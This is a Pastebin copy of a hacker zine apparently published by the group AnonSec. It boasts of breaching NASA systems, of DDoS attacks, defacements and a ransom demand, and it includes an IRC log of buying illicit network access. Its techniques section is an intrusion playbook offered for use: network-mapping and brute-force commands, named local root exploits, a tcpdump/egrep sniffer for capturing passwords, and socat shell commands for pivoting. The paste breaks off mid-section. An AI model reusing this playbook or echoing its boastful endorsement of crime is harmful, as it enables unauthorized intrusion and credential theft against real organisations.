API tools faq
paste
Guest User

.

a guest
Apr 19th, 2016
1,733
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 31.29 KB | None | 0 0
raw download clone embed print report
  1. -----BEGIN PGP SIGNED MESSAGE-----
  2. Hash: SHA1
  3.  
  4. Version: OpNasaDrones
  5. pub 4096R/4AAE63E0 2015-10-01
  6. Key fingerprint = DEFD 83DD 81B5 A61D 9959 C009 4CFF 6773 4AAE 63E0
  7. uid AnonSec (Nihil Verum Est Omnia Licita) <An0nsec@protonmail.ch>
  8.  
  9. .8. b. 8 ,o888888o. b. 8 d888888o. 8 8888888888 ,o888888o.
  10. .888. 888o. 8 . 8888 `88. 888o. 8 .`8888:' `88. 8 8888 8888 `88.
  11. :88888. Y88888o. 8 ,8 8888 `8b Y88888o. 8 8.`8888. Y8 8 8888 ,8 8888 `8.
  12. . `88888. .`Y888888o. 8 88 8888 `8b .`Y888888o. 8 `8.`8888. 8 8888 88 8888
  13. .8. `88888. 8o. `Y888888o. 8 88 8888 88 8o. `Y888888o. 8 `8.`8888. 8 888888888888 88 8888
  14. .8`8. `88888. 8`Y8o. `Y88888o8 88 8888 88 8`Y8o. `Y88888o8 `8.`8888. 8 8888 88 8888
  15. .8' `8. `88888. 8 `Y8o. `Y8888 88 8888 ,8P 8 `Y8o. `Y8888 `8.`8888. 8 8888 88 8888
  16. .8' `8. `88888. 8 `Y8o. `Y8 `8 8888 ,8P 8 `Y8o. `Y8 8b `8.`8888. 8 8888 `8 8888 .8'
  17. .888888888. `88888. 8 `Y8o.` ` 8888 ,88' 8 `Y8o.` `8b. ;8.`8888 8 8888 8888 ,88'
  18. .8' `8. `88888. 8 `Yo `8888888P' 8 `Yo `Y8888P ,88P' 8 888888888888 `8888888P'
  19.  
  20. 4c 61 75 67 68 69 6e 67 41 74 59 6f 75 72 53 65 63 75 72 69 74 79 53 69 6e 63 65 32 30 31 32
  21.  
  22. ` ```
  23. ``` ... ```` `` ``--` ``
  24. ``. .--. ..``-.-.` `..````.:. .-.. ```
  25. ` ---```.`.` -..` `.`- `..:. ` --` `
  26. .-- `---` ``.. `...` `.-.` .--
  27. `.``.:.`` ````` ... ```.-- `-.
  28. ` .--`````.` ....``` --. `
  29. ``. ....``` ` ``````.`````-`` `` `````....` .``
  30. ` .-.```.```. ```..---....`.-----``.-.. ` ``...```... `
  31. `.``.`-.``` ..-.`..:`.--..-::.-.`...`-.-` . .:..-. .`
  32. .--.`` .-.` `.--.`-.....---..`----.--`--`---.`` `.-` ``.`-`
  33. ` `.`.---.` `-.--...-.-.-...`.-`..--.`...-.-..:... `.```--.```
  34. `-.````... `...`.`.--``-..........-...-.`.......`.. `...`` .`
  35. `-..````` ```..```.--...`...--....-`..--..`.-......` ```. `.``
  36. .``-....`` ..`.. ...----`........--....-..`.---.---. `.`.``.````
  37. ..-```..` `-.-. ``-....-:.-.``..-.........-.....--.. ...````-.
  38. `---..---. `--` ./.---..`--......--:---`---.-..-.---. -::----..
  39. `. `.`--. `:-. `.-..-.`.---:----..- ---::----..-..-: `- ..`` ..
  40. .--```.`.` `--` ---.``` `..:...-.-` ` `--.--..`-. `:.````.--
  41. .-....-.`` `-.. ..-. ``..`..-` ``---`.`.` .--......
  42. ```...--`` ..` .`.. `-...:- --.``..` ....-...``
  43. ..` `` .` `-. ..- .-..`--` .-.``-.. .` ` `.
  44. ..`..---. `--- .``.-...-` ..: . .--.`..`.-
  45. ``.`.--` ``.`.-` `-..-. `---.`` `.--.` .``..``
  46. .` `` `--. ..`.-.------:-`-..- .--.-..-..`-:----.- `.` `-:
  47. `..`.`.-.` .:..-``....--:--. ......-.--..-.`--. .-.``..`.`
  48. `.......``` ```-:.-....`...` `.` .--..`....-..-. ```..`.. .`
  49. `.`````.. ..``..``.--.`...``-.`-..--.`.``` -- `````
  50. ---.``--.. `....-..-:.-....`-..---` :-````.:--
  51. `----::`.` ` .` `--.--.....---.-``.. ``/-.---.-
  52. ```. `--. ---. `...-..---..``` --- ---``` ```
  53. ..-..`.---`` .-... .. .``.`.. -` `-`-- --`.``-...`
  54. `.-..-...`.-` ....-. ` ` ` .--:` ````.-.--...`
  55. `.....`` .-` ..--` `.-..` `.`.```...```
  56. ``` ```.``` ...-.` ` ` `` ` `...`. ` `.....` ``
  57. .--..-.--` --` ....-``` ```.` .`` `-..`` ... `-..`` .`
  58. `..` ```.`.` .` ...--:--.`.....`....... ` `--.``. .--`
  59. .......`..` -.. ..`-........-----`-` ..-` --.``.`--.`
  60. ``..-``.````-`.` ..` `.--....`.-``-` ``. `...`````.....``
  61. ``````````...` ... ` ` ```````` ` ``` ``... ``..``` ``````
  62. ..````-..` `..`. ..`` ``.--`.---. `.``--.-`
  63. .``.-.` ```--:. ..`-. -..-` .:-.``` `.--`.`
  64. `.:- .--`` `-.-. `-.````.-.. .-.`
  65. ``-`--. `..-..` ```` ```.``-.`..` .`-::-`
  66. ```-..---`` ` `````` ` ``.--..`.` ```
  67. `````..` `` ` ``.`` ``
  68. #AnonSec
  69. /dev/null before dishonour
  70.  
  71.  
  72.  
  73. + o + o
  74. BEWARE +------------------------------------+ + o + +
  75. OF | Table of Contents | o +
  76. RANTS, |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| o + + +
  77. | 0x00 - Preface | + o o + o
  78. RICKTROLLING | 0x01 - FLASH FROM THE PAST | -_-_-_-_-_-_-_,------, o
  79. | 0x02 - TTP(Tech/Tac/Pro) | _-_-_-_-_-_-_-| /\_/\
  80. AND | 0x03 - NASA Missions&Aircraft | -_-_-_-_-_-_-~|__( ^ .^) + +
  81. | 0x04 - Chemtrails/CS/GE/WM | _-_-_-_-_-_-_-"" ""
  82. ROOTKITS | 0x05 - WHATS A ROOTKIT? | + o + +
  83. | 0x06 - Russian Roulette | + o o + o
  84. | 0x07 - Epilogue | + +
  85. +------------------------------------+ o o o o +
  86.  
  87.  
  88.  
  89.  
  90. > 0x00 - Preface
  91.  
  92.  
  93. "Look, the people you are after are the people you depend on. We cook your meals,
  94. we haul your trash, we connect your calls, we drive your ambulances. We guard you
  95. while you sleep. DO NOT... FUCK WITH US."
  96.  
  97.  
  98. Well here we are, its 2015/2016 and shit has gotten weird... like "No more secrets Marty" weird.
  99. But if there is one thing our team has learned over the past years, its that no one has
  100. impermeable OpSec, not even the NSA or GCHQ, e.g. Snowden leaks, ICWATCH, NSA Playset, etc...
  101.  
  102. Basically, people will ALWAYS be the biggest vulnerability in any networked system.
  103. With that being said, we want to take the time to thank all baby boomer secretaries
  104. world-wide, without your lack of training and irresistible urge to open attachments in
  105. spoofed emails from the HR department, this would have never happened lol // Gozi ftw ᕙ༼ ,,ԾܫԾ,, ༽ᕗ
  106.  
  107. +==================================================================================+
  108.  
  109.  
  110. .-------.
  111. .' `.
  112. .' `.
  113. | NO SKIDS |
  114. | ALLOWED |
  115. | BEYOND |
  116. ' THIS '
  117. `. POINT .'
  118. `._______.' __ __
  119. | | .----/ \ / \---.
  120. | | | | | | |____
  121. | | | |`--''`--'| / | \_
  122. ,----.| \~O~| ~O~ _ | | | \
  123. | ---'| '._/ \_.| `| | | |
  124. \.---'| | | `- ,| |
  125. `---'| | : |
  126. | | | | '._.-- ;
  127. | | | . .: ` /
  128. '-' | '....' `.______/
  129. | |
  130. | |
  131. `----------------'
  132. || ||
  133. || ||
  134. _.---'' '-, ,-' ''---._
  135. / __..' '..__ \
  136. '---''` `''---'
  137.  
  138.  
  139. For those who dont know us, AnonSec was created in Nov 2011 by MrLele(a former AnonGhost admin,
  140. now Peshmerga sniper) and AnonSec666(US python programmer). Since our start with two members from
  141. Kurdistan and USA; we have come a long way; adding members and associates from the UK, Germany,
  142. Japan, Malaysia, Morocco, Indonesia, India, Pakistan, Iraq, Italy, Romania and even Latvia. //shouts to CWA, LizardSquad & TeaMp0isoN || rip alg0d
  143. Here are just a few Operations we either started or were heavily involved in...
  144.  
  145. ==> #OpNasaDrones == hacked NASA's drone servers and ex-filtrated missions data; vid/data logs [possibly prove existence of Chemtrails and their global warming effect(also their bad OpSec of course)]
  146. e.g. - http://anonhq.com/anonsec-hacked-drone/
  147. - https://www.cyberguerrilla.org/blog/anonymous-operation-nasa-drones-anonsec/
  148. - http://cyberwarzone.com/anonsec-hackers-claim-hacked-nasa-drones/
  149. ==> #OpBeast/OpNullDenmark == after DDoSing, defacing or rm -rf / 100's of beastiality sites, Denmark finally changed their laws
  150. - http://www.mirror.co.uk/news/technology-science/technology/anti-bestiality-hackers-target-vile-dog-5310038
  151. - http://www.techworm.net/2015/04/anonymous-launch-opbeast-against-animal-cruelty-and-depravity.html
  152. - http://www.bbc.co.uk/newsbeat/article/32411241/denmark-passes-law-to-ban-bestiality
  153. ==> #OpDetroit == DDoS servers over Detroit water shutoffs also seized a Detroit govt DB and demanded BTC ransom
  154. - http://www.rt.com/usa/206663-detroit-bitcoin-ransom-database/ // they never mentioned AnonSec even tho a member was v& over it *sigh*
  155. - http://www.techworm.net/2014/11/hackers-encrypted-entire-city-detroit-database-demanded-ransom-2000-bitcoins-803500.html
  156. - http://pastebin.com/raw.php?i=fc5s029B
  157. - http://www.usatoday.com/story/news/nation/2014/08/04/detroit-water-shutoffs/13584027/ // Detroit suspended water shutoffs until August 25th, 1 day after we demanded
  158. ==> #OpIsrael == once a year we join in the chaos of fucking raping Israeli cyberspace in protest of the current apartheid #FreePalestine
  159. - https://en.wikipedia.org/wiki/OpIsrael
  160. - https://www.rt.com/news/opisrael-anonymous-final-warning-448/
  161. - https://www.rt.com/news/anonymous-israel-cyber-attack-737/
  162. - https://www.youtube.com/watch?v=Uxy57ofajwE
  163. - https://www.youtube.com/watch?v=uskOcl0OHwY
  164. - https://ent.siteintelgroup.com/Dark-Web-and-Cyber-Security/anonsec-allegedly-hacks-israel-defense-forces-military-preparatory-school-in-support-of-palestine.html
  165. ==> #OpISIS/#OpTerror4ISIS == worked with GhostSec to take down thousands of ISIS twitter accs, websites and forums
  166. - http://www.techworm.net/2015/04/opisis-anonymous-release-list-of-70-pro-isis-websites-and-14000-of-twitter-ids.html
  167. - http://cyberwarzone.com/anonsec-declares-war-isis-opterror4isis/
  168. - https://ent.siteintelgroup.com/Dark-Web-and-Cyber-Security/site-1-20-15-anonsec-announces-operation-terror-4-isis-releases-terrorist-group-government-target-list.html
  169. ==> #OpDeathEaters == Expose a UK Paedophilia network being protected by the political elite
  170. - http://www.telegraph.co.uk/news/worldnews/northamerica/usa/11363303/Anonymous-hackers-turn-fire-on-global-paedophile-menace.html
  171. - http://www.dailydot.com/politics/operation-death-eaters-opdeatheaters-anonymous-pedosadism-prince-andrew/
  172. - http://www.ibtimes.co.uk/opdeatheaters-anonymous-marches-planned-across-uk-us-highlight-global-network-child-abusers-1487867
  173. ==> After hacking the Windsor University School of Medicine & leaking DBs, we deleted +$9,000,000 in student loan debt instead of phishing students ^_^
  174. - https://ent.siteintelgroup.com/Dark-Web-and-Cyber-Security/windsor-university-school-of-medicine-allegedly-hacked-student-database-leaked.html
  175. - https://twitter.com/_d3f4ult/status/651290005793472512
  176. ==> And tons of others that were rekt for various reasons
  177. - https://ent.siteintelgroup.com/index.php?option=com_customproperties&view=search&task=tag&tagId=658&Itemid=1355
  178. - https://twitter.com/search?q=%40VaraCyber%20Anonsec&src=typd
  179. - http://belsec.skynetblogs.be/archive/2014/11/04/70-000-bitcoin-access-accounts-hacked-at-btc-e-com-and-sold-8318769.html
  180. - http://www.bitdefender.com/security/anonsec-hacking-group-breaches-720-random-sites-worldwide;-mocks-lax-security.html
  181. - http://thecryptosphere.com/2014/10/08/anonsec-hackers-tangodown-turkish-e-commerce-sites/
  182. - http://www.eduicon.com/News/Details/3485.html
  183. - http://www.tech.com.pk/2014/01/720-websites-hacked-and-defaced-by.html
  184. - http://www.meethackers.com/2014/04/mcdonalds-id-leaked-by-anonsec-hackers.html
  185. - http://pastebin.com/qYUeCzNJ
  186. - http://pancasilacyberteam.blogspot.sg/2014/04/1381-email-dibocorkan-oleh-anonsec-dan.html
  187. - http://www.wired.com/2015/11/cia-email-hackers-return-with-major-law-enforcement-breach/
  188. - http://zone-h.org/archive/notifier=AnonSec
  189.  
  190.  
  191.  
  192. Since our inception we have certainly had our 'ups&downs' as you could say, from a core member
  193. getting v&, @MrLele1337 going afk to fight ISIS irl and some even becoming whitehats at tech
  194. companies(Pr3dat0r). However, we are still here laughing at 'security', exposing feds online
  195. & fucking everyones databases... long dick style (•_•) ( •_•)>⌐■-■ (⌐■_■)
  196. On a more serious note, this is AnonSec's very first zine!
  197. So grab some popcorn and lets get this blood orgy started...
  198.  
  199.  
  200. ____________________________________________________
  201. / \
  202. | _____________________________________________ |
  203. | | | |
  204. | | | |
  205. | | root@onion.land:~# irssi | |
  206. | | | |
  207. | | | |
  208. | | | |
  209. | | | |
  210. | | | |
  211. | | | |
  212. | | | |
  213. | | | |
  214. | | | |
  215. | | | |
  216. | |_____________________________________________| |
  217. | |
  218. \_____________________________________________________/
  219. \_______________________________________/
  220. _______________________________________________
  221. _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
  222. _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
  223. _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
  224. _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
  225. _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
  226. :-----------------------------------------------------------------------------:
  227. `---._.-----------------------------------------------------------------._.---'
  228.  
  229.  
  230.  
  231. +==================================================================================+
  232. |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  233. |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~NEXT CHAPTER~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  234. |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  235. +==================================================================================+
  236.  
  237.  
  238.  
  239.  
  240. > 0x01 - FLASH FROM THE PAST
  241.  
  242.  
  243. Lets take time to appreciate how this all started 2 years ago...
  244.  
  245. ° ☾ ☆ ¸. ¸  ★  :.  . • ○ ° ★  .   . .  ¸ .   °  ¸. * ● ¸ .
  246.  ...Long ago   ° ☾ °  ¸. ● ¸ .  ★ ° :.  . • °   .  * :. 
  247. • ○ ° ★.in an IRC far, ● ¸     ° ☾ °☆  . * ¸.   ★ ★ ° . . 
  248. .    . ☾ °☆  . * ● far away.......° ☾ ★ °● ¸ .   °  ¸. * ●
  249. .   ★ ° :.  . • ○ ° ★. .  ¸ .  ★ ★ ° . .  ☾ °☆.   °  ¸.
  250.  
  251.  
  252.  
  253. $# /join #64616e74657320696e6665726e6f 4c696d626f
  254. (3:24) == Shimo7even [root@onion.land] has joined #64616e74657320696e6665726e6f
  255. (3:24) -REDACTED- : Finally....
  256. (3:24) * -REDACTED- glares at Shimo7even for being late
  257. (3:25) Shimo7even : br00te told me DA willing to sell access?
  258. (3:25) 鬼佬 : yes, NASA still
  259. (3:26) -REDACTED- : Nothing interesting on this server but it would serve as a good foothold in the network
  260. (3:27) Shimo7even : im listening
  261. (3:27) 鬼佬 : we held several nets for Miami before v&
  262. (3:27) 鬼佬 : we injected our own malware
  263. (3:28) -REDACTED- : pareizs
  264. (3:29) 鬼佬 : we have no idea who else they gave access to
  265. (3:29) 鬼佬 : did +10,000 bot kills just to be safe
  266. (3:29) pangeran : hhhhhhhhhhhhh itu lucu XD XD
  267. (3:30) Bashtien : so how much you guys want?
  268. (3:30) 鬼佬 : -REDACTED-
  269. (3:31) -REDACTED- : So, still think you can afford our services?
  270. (3:31) pangeran : ^^^^^^ hhhhhhhhhhhhhhhhhhh ^^^^^
  271. (3:31) Shimo7even : Afford? That's rich
  272. (3:32) Shimo7even : LoLing@You -REDACTED-
  273. (3:33) Sh1n0d4 : play nice..
  274. (3:34) Bashtien : -REDACTED- we have been sitting on a ton BTC-E accs for a while now..
  275. (3:34) Bashtien : so crypto funds are no problem m8
  276. (3:35) хуй : ^^
  277. (3:35) d3f4ult : We will even tumble the coins multiple times, so they are 100% clean
  278. (3:35) TGab : Those poor Cossaks, ha
  279. (3:37) Shimo7even : BTC or LTC?
  280. (3:37) 鬼佬 : btc
  281. (3:38) 鬼佬 : https://anonfiles.com/file/-REDACTED-REDACTED-REDACTED-REDACTED-
  282. (3:39) Bashtien : cant read the url in the screenshot..
  283. (3:41) -REDACTED- : thats a decoy.. open it in a hex editor, there is a url to a zip containing a txt file with the real backdoor url
  284. (3:41) Sh1n0d4 : that OpSec though lol
  285. (3:43) * TGab crunches popcorn
  286. (3:45) Bashtien : pass?
  287. (3:45) 鬼佬 : 547265616368657279 for both the zip and shell
  288. (3:46) d3f4ult : fuhosin ^_^
  289. (3:49) * Bastien starts a slow clap
  290. (3:50) * TGab drops popcorn all over the floor
  291. (3:50) d3f4ult : Awww, was hoping it was rooted :(
  292. (3:50) -REDACTED- : No but we fingerprinted many outdated systems in the network
  293. (3:51) pangeran : wkwkwkwkwkwkw!!! DA ftw \(^_^)/
  294. (3:51) Sh1n0d4 : well thats good enough for me, wbu shimo?
  295. (3:53) Shimo7even : !sendbtc -REDACTED- -REDACTED-REDACTED-REDACTED-REDACTED-
  296. (3:53) Sh1n0d4 : Well thats a yes haha
  297. (3:53) == ゴールド [~ゴールド@co.in] has joined #64616e74657320696e6665726e6f
  298. (3:53) ゴールド : https://blockchain.info/address/-REDACTED-REDACTED-REDACTED-REDACTED-
  299. (3:54) ゴールド : 送信
  300. (3:55) == ゴールド [~ゴールド@co.in] has quit [Client Quit]
  301. (3:55) -REDACTED- : Pleasure doing business, until next time.
  302. (3:55) 鬼佬 : 谢谢 :)
  303. (3:56) == 鬼佬 [龙@58.87.127.147] has quit [Client Quit]
  304.  
  305.  
  306. [>Disclaimer: Certain information was -REDACTED- due to privacy concerns or by request.]
  307.  
  308.  
  309.  
  310.  
  311. +==================================================================================+
  312. |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  313. |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~NEXT CHAPTER~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  314. |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  315. +==================================================================================+
  316.  
  317.  
  318.  
  319.  
  320. ~~~==+ THE WORLD IS CORRUPT, DONT BE SHEEP TO THE SLAUGHTER +==~~~
  321. SURVIVE | CONTEMPLATE | INNOVATE
  322.  
  323.  
  324.  
  325.  
  326. > 0x02 - TTP(Techniques, Tactics & Procedures)
  327.  
  328.  
  329. So yeah, we know what you're thinking, hacking NASA? How fucking cliche...
  330. If only I had a Dogecoin for everytime someone claimed that, amiright?
  331. Its like the boy who cried wolf but with hacking NASA instead lol
  332. But you might be surprised how low govt security standards can be, especially with a limited
  333. budget and clueless boomers controlling the network. NASA has been breached more times than
  334. most people can honestly remember (our favorites were Gary McKinnon && Mendax's milw0rm)
  335. // you know, when people used to have legit reasons for their hacks^^
  336. Reasons from searching for hidden evidence of UFO technology to protesting use of Uranium based rocket fuel ^_^
  337.  
  338.  
  339. "What the Fuck gives you freedom,
  340. freedom brings opportunity,
  341. opportunity makes your future"
  342.  
  343.  
  344. However, this hack into NASA wasnt initially focused on drones data and upper atmosphere chemical samples.
  345. In fact the original breach into NASA systems wasnt even planned, it was caught up in a gozi virus spread.
  346. After purchasing our initial foothold, we were just seeing how many machines we could break into, root
  347. and possibly find interesting/profitable data. So Bashtien contacted Dr.d3v1l, an italian hacker who recently
  348. hacked and defaced several NASA subdomains. They provided much insight into common CMS's NASA uses as
  349. well as potential weak spots in their networks.
  350.  
  351. Since our first shell in NASA systems just had user acc priv, we were fairly limited as to not only what
  352. dirs we could access, the commands we could run and the other machine/devices on the network that should have
  353. been visible. Getting root access on this box would be ideal, so that what we went for.
  354.  
  355. Unfortunately, this box was running the latest version of debian and didnt have any local root CVEs(publicly)
  356. and we failed to spear phish the root passwd... luckily MA saved the day with his 2014 bypasses & symlink exploits.
  357. With this we were able to simulate root in a new linux directory and run any command. This allowed us to move tools/utils/modules
  358. (get-pip.py/eggs)/0days to the box as needed[see scp_tools.txt]. scp_tools.txt contains a list of some TTP that were
  359. used to accomplish these hacks, its best to make a couple shell scripts for much quicker downloads(scp_tools.sh).
  360.  
  361.  
  362. >cat scp_tools.txt
  363. ~ Map Network ~
  364. nast -m
  365. reverse-ip lookups
  366. whois & reverse-whois
  367. dirbuster
  368. [MapNet]
  369.  
  370. ~ Scan Ports/Fingerprint/Enumerate ~
  371. unicornscan && onetwopunch.sh
  372. Nmap NSE - NFS - SMB
  373. LinEnum.sh
  374. linuxprivchecker.py
  375. fierce.pl
  376. Bluto
  377. dnswalk
  378. Network Miner
  379.  
  380. ~ Vuln Scanner ~
  381. Linux_Exploit_Suggester.pl
  382. unix-privesc-check
  383. nikto.pl
  384. wpscan.rb
  385. joomscan.pl
  386. uniscan
  387. wapiti
  388. w3af
  389. nipper
  390.  
  391. ~ Bruteforce ~
  392. hydra w/ passwd lists
  393.  
  394. ~ 0days ~
  395. Mauritania Attackers 2014 bypasses & r00t Symlink Exploits
  396. CVE-2013-5065
  397. CVE-2014-0038
  398. WD My Book World Edition SSH root remote enable
  399.  
  400. ~ Packet Capture/Sniffers/Recovery ~
  401. wireshark
  402. tcpdump
  403. dsniff
  404. mimikatz
  405. egrep
  406.  
  407.  
  408. // special thanks to Mauritania Attacker for his bypasses & symlink exploit ^_^
  409.  
  410.  
  411.  
  412.  
  413. "Assume every network you're on is malicious"
  414. - Samy Kamar
  415.  
  416.  
  417.  
  418.  
  419. *Mapping a network can be accomplished a million different ways, depending on the type of box your foothold is.
  420. By that we mean; what OS is it, what utils and dependencies does it have already installed, what privileges do
  421. you have, is there any IP restrictions? Once we had a symlinked r00t directory filled with tools is when the
  422. real fun began... we started mapping their network.
  423.  
  424.  
  425. +=========================================================================+
  426. | Our General Steps for Mapping & Propagating Laterally Through a Network |
  427. +=========================================================================+
  428.  
  429. 1) Once we had access to a box in the network..
  430. [MapNet] Here are just a few simple commands to scan active nodes within a network:
  431. arp
  432. nast -m
  433. ip neigh
  434. AngryIpScanner (has GUI)
  435. arp-scan -l -I eth0
  436. ping -b 192.168.1.255
  437. smbtree -NS 2>/dev/null
  438. nbtscan 192.168.1.1-255
  439. fping -a -g 192.168.1.0/24 2> /dev/null
  440. nmap -sP 192.168.1.0/24 or nmap -sn 192.168.1.0/24
  441. for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip>/dev/null; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
  442.  
  443.  
  444. 2) Next to get a broader view of their entire network, we started probing whois and reverse-whois lookups on the ip
  445. addresses and domain names we found, as well as registrars info(ex. "222 S Mill Avenue" inurl:domaintools). Also
  446. running Bluto & fierce.pl to find ip leaks via DNS zone transfers. If scans are fruitful with new hosts found, repeat
  447. steps 1&2 on the new addresses. Do this until you cant find any more hosts.
  448.  
  449. 3) Once we started seeing other connected nodes on the same LAN, it was time to run some port scans and do some
  450. passive OS/BIOS fingerprinting. (unicornscan && onetwopunch.sh or nmap NSE scripts come in handy here)
  451.  
  452. 4) After mapping some nodes, scanning ports and fingerprinting; we started looking up CVE's for the different versions
  453. of operating systems and the various services running.(Linux_Exploit_Suggester.pl, unix-privesc-check, nikto.pl,
  454. uniscan and CobaltStrike are the best for automating this process)
  455.  
  456. 5) Any system running RDP/VNC/SSH/MYSQL should always be bruteforced because its common for administrators to either
  457. leave the default login or to use an extremely common passwd.
  458.  
  459. > ALWAYS -e nsr WHEN BRUTEFORCING <
  460.  
  461. +-+-+ +-+-+-+-+-+-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+
  462. |I|n| |C|o|m|m|o|n|l|y| |u|s|e|d| |P|a|s|s|w|o|r|d|s| |W|e| |T|r|u|s|t|
  463. +-+-+ +-+-+-+-+-+-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+
  464.  
  465. [22][ssh] login: root password: root
  466. 1 of 1 target successfully completed, 1 valid password found in 0.32s
  467.  
  468.  
  469. 6)* If the site is being used as a public server or for any type of database storage, it will most likely have a
  470. CMS(content management system) with a cpanel. So try running cmsmap.py, wpscan.rb or joomscan.pl.
  471.  
  472. 7)* If the server has any kind of web application on it, try running wapiti and w3af.
  473.  
  474. 8)* If there are any firewalls, switches or routers found in the network, try running nipper(SonicWALL lol).
  475.  
  476. 9) Scanners are great for those of us who are either busy or lazy, but they also tend to generate alot of false positive results. One of the most important steps is to use something like dirbuster and manually browse various .xml, .js, .php and php.in files source for SQLi,
  477. XSS, LFI, RFI, FPD, HostHeaderAttacks etc[this requires decent programming and exploitation knowledge to spot possible configuration errors,insecure functions or unsanitized inputs i.e _SERVER["HTTP_HOST"] ], unserialize(), popen() , strcmp(), exec(), system(), shell_exec(), escapeshellcmd(), passthru(), create_function(), pcntl_exec(), eval() & many many more!
  478. Here is an example of NASA SQLi and XSS vulnerabilities:
  479. SQLi: http://prntscr.com/9hekve
  480. XSS: http://prntscr.com/9kkc8r && http://prntscr.com/9kkcnf
  481.  
  482.  
  483. 10)* If that comes up with nothing then its either brute forcing a login, spear phishing a login with XSS or SEing a login or passwd reset. (hacked VPSs/RDPs, proxies, hydra+wordlists && some burner sims/phones or VoiP servers or hacked Skype accs are a definite must have for this)
  484.  
  485. 11) Always target the most vulnerable nodes first(minus false positives). //They have many WinXP & unpatched Ubuntu servers btw
  486. - WinXP Local SYSTEM privilege escalation: CVE-2013-5065
  487. - Ubuntu Local root exploit: CVE-2014-0038
  488.  
  489. 12) Everytime we gained access to a new box we always left a packet sniffer running to hopefully get some http/ftp/smtp/imap/pop3 logins:
  490. tcpdump -i eth0 port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=||name=|name:|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
  491. ngrep -q -W byline "GET|POST HTTP"
  492. dsniff -m
  493.  
  494.  
  495. \!/ ALWaYS RUN SC4NS oN N3W BOXes FOR MORE NoDES \!/
  496.  
  497.  
  498. 13) Pivoting is great for all kinds of things like bypassing firewalls & getting reverse shells w/ statically linked copy of socat to drop on target:
  499. target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
  500. host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!